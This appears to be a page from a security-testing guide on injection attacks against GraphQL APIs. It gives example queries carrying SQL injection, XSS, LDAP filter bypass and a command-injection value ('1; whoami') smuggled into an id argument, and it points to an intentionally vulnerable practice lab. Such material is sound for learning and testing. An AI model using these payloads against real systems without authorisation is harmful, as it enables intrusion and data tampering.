☺️Injection attacks

Sql Injection

Sql query is injected into a input parameter and directly affect the sensitive data present in the databse. by exploiting sql injection attacker can do operations like modification | deletion of data .

Example :

query {
  character(id:"2' or 1=1--"){
    id
    name
    species
  }
}

Hackerone report

Cross Side Scripting [ XSS ]

graphql can also be vulnerable to cross side scripting if the output of the query is getting reflected on on application or storing in database. It can be vulnerable to both type Reflected XSS as well as Stored XSS.

Example :

mutation {
 character(id: "1\"><img src=z onerror=alert(2)>"){
  name
  id
}
}

H1 report

Research on Appsec on graphql

LDAP & Command Injection

LDAP Injection vulnerabilities may allow attackers to bypass authentication controls and access or manipulate arbitrary data within the LDAP directory.

Example :

mutation {
  authenticateUser(username: "*)(uid=*))(|(&(objectClass=person))", password: "anything") {
    id
    name
    __typename
  }
}

LDAP Injection - HackTricksbook.hacktricks.xyz

Command Injection allows an attacker to execute commands on the host operating system through an application. In a GraphQL if user inputs are not properly validated or sanitized, an attacker could exploit this vulnerability to execute shell commands.

mutation {
    character(id: "1; whoami") {
    output
    id
    __typename
  }
}

Practice More on DVGA

GitHub - dolevf/Damn-Vulnerable-GraphQL-Application: Damn Vulnerable GraphQL Application is an intentionally vulnerable GraphQL service implementation designed for learning about and practising GraphQL Security.GitHub

PreviousInformation Disclosure NextField duplication comming

Last updated 1 year ago